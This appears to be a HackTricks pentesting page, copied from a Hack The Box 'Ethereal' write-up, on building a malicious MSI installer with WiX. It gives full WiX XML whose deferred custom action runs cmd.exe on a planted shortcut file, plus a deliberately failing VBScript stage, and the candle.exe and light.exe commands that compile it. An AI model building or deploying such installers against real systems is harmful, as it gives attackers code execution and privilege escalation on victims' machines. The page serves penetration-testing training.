HackTricks
Search…
Pentesting
Powered By GitBook
Create MSI with WIX
Tutorial copied from https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root In order to create the msi we will use wixtools , you can use other msi builders but they didn’t work for me. Check this page for some wix msi usage examples. We will create an msi that executes our lnk file :
1
<?xml version="1.0"?>
2
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
3
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
4
Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
5
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
6
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
7
<Directory Id="TARGETDIR" Name="SourceDir">
8
<Directory Id="ProgramFilesFolder">
9
<Directory Id="INSTALLLOCATION" Name="Example">
10
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
11
</Component>
12
</Directory>
13
</Directory>
14
</Directory>
15
<Feature Id="DefaultFeature" Level="1">
16
<ComponentRef Id="ApplicationFiles"/>
17
</Feature>
18
<Property Id="cmdline">cmd.exe /C "c:\users\public\desktop\shortcuts\rick.lnk"</Property>
19
<CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
20
Impersonate="yes"/>
21
<CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
22
fail_here
23
</CustomAction>
24
<InstallExecuteSequence>
25
<Custom Action="Stage1" After="InstallInitialize"></Custom>
26
<Custom Action="Stage2" Before="InstallFiles"></Custom>
27
</InstallExecuteSequence>
28
</Product>
29
</Wix>
Copied!
We will use candle.exe from wixtools to create a wixobject from msi.xml
1
candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml
Copied!
Then we will use light.exe to create the msi file from the wixobject:
1
light.exe -out C:\tm\Ethereal\rick.msi C:\tmp\wix
Copied!
Last modified 8mo ago
Copy link